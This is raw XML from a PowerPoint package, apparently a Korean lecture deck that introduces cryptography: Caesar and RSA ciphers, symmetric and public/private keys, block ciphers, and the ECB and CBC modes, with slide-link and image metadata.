<file path=ppt/slides/_rels/slide385.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74.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image568.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image567.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide386.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571.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide374.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image570.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image569.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image554.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide387.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74.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27.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slide" Target="slide374.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide389.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575.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide374.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image574.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image573.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image572.bmp"/></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 Target="slide25.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.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slide" Target="slide422.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide390.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579.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide374.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image578.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image577.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image576.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide39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2.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74.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image108.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide392.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74.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74.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74.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74.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2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide294.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97.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide294.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398.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294.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slide" Target="slide4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40.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00.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244.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide402.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide401.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00.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2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide400.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03.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00.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2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide400.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05.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00.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2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide400.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07.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00.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2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide400.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09.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0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10.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2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide400.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11.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00.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2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide400.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13.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00.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2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide400.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15.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00.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2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide400.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17.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00.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244.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide419.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide419.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2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide418.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slide" Target="slide422.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.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20.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18.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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.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74.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide315.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide246.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide46.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide423.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424.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422.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425.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80.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.kocw.net/home/search/kemView.do?kemId=978503" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide426.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315.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image" Target="../media/image58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hyperlink" Target="http://archive.ubuntu.com/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.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slide" Target="slide422.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://archive.ubuntu.com/ubuntu/pool/universe/b/bgpdump/" TargetMode="External"/><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slide" Target="slide155.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide181.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide219.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide132.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide235.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide48.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide214.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide99.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide160.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide79.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide210.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide224.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide55.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide158.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide203.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide47.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide181.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide55.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide160.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132.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide99.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide79.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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5.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.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422.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide51.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5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53.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54.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slide" Target="slide422.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66.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide71.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide57.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide46.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide75.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide65.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide70.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide56.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide69.xml"/><Relationship Id="rId20"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slide" Target="slide60.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide64.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide59.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide68.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide63.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide72.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide58.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide62.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide67.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide56.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2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67.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22.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slide" Target="slide93.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide83.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide92.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><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slide" Target="slide89.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide46.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide55.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide97.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide84.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide9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422.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9.xm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81.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83.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422.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide8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79.xml"/><Relationship Id="rId2"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image" Target="../media/image111.png"/><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422.xml"/></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422.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide92.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3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><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4.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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image117.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image116.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide248.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slide" Target="slide102.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide46.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>시저</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en-US" altLang="ko-KR" sz="1400" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>rsa</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암호 실습</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26915567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hlinkClick r:id="rId8" action="ppaction://hlinkfile"/>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887040321"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3693381" y="2564266"/>
          <a:ext cx="3959749" cy="1968311"/>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Block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Block </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>암호</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err="1"/>
              <a:t>대칭키</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>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369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>암호화 키 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>복호화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필요</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="RAON CTF - WEB Essential">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B96E0AD-7A00-4F5D-99E8-561C8EACC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848" y="2507273"/>
            <a:ext cx="6330043" cy="355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99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a:t>비대칭키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646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>공개키 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>모든 사람이 접근 가능한 키</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>개인키 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>사용자만이 가지고 있는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할 필요가 없음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="그룹 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF7AB115-6086-416B-865A-083B9F33B6F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1826077" y="2755354"/>
            <a:ext cx="8215995" cy="3220071"/>
            <a:chOff x="1826077" y="2755354"/>
            <a:chExt cx="8215995" cy="3220071"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3074" name="Picture 2" descr="암호학] 대칭키 vs 공개키(비대칭키) 암호화 차이">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5B23294-EF48-4C92-ABFC-131066802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077" y="2755354"/>
              <a:ext cx="8215995" cy="322007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38D53DBE-80BE-4784-886F-13A48E670B09}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8156121" y="5412921"/>
              <a:ext cx="1869622" cy="46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221886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63" y="2938348"/>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700" kern="0" dirty="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실행 단추: 문서 32">
            <a:hlinkClick r:id="rId8" action="ppaction://hlinkfile"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B8E6399-6C6C-45E1-8F02-79DA716AD5BF}"/>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696936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C8F985A5-BC79-4AFA-8536-92790B70CA5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개인키와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B1898AA4-44B7-43D9-B184-DD83185EB435}"/>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85474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F8907B7-D4F7-4235-B145-39E62E05E639}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956000" y="2136338"/>
            <a:ext cx="8555393" cy="2585323"/>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Block </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>암호란</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>평문을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 블록 단위로 암호화하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>대칭키</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 암호 시스템</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>블록 단위로 암호화를 한다는 의미</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암호화 방식을 정할 때</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>임의의 길이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>평문에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 대해 고민할 필요가 없이 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>고정된 길이의 각 블록을 암호화하는 방식만 정하면 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10340214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descr="Investigating Block Cipher Modes with DPA - ChipWhisperer Wiki">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B98D54A-7CA4-4B9A-BB3A-7A15B2825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024" y="4048126"/>
            <a:ext cx="572452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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="그림 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A60F17C-3CAD-454D-AA47-8D58501F7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2038"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ECB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같음</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40211114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CBC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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>다름</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="Block cipher mode of operation - Wikipedia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22325523-97EE-4987-B776-7E3C4547A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28" y="4195033"/>
            <a:ext cx="57150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33AFA75D-EBCB-4074-AA96-3A8797416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5780" y="1929829"/>
            <a:ext cx="1585912" cy="1879156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13928227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실행 단추: 문서 14">
            <a:hlinkClick r:id="rId4" action="ppaction://hlinkfile"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C642B003-6020-4FE7-AA7E-45DA4D6257C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9299644" y="3527960"/>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5B20F288-DE2B-4404-9C20-09AC05312DB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133856" y="1791005"/>
            <a:ext cx="5563710" cy="4507222"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="그림 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5DD02C1-4E61-4FAF-B719-6BF37EFED382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
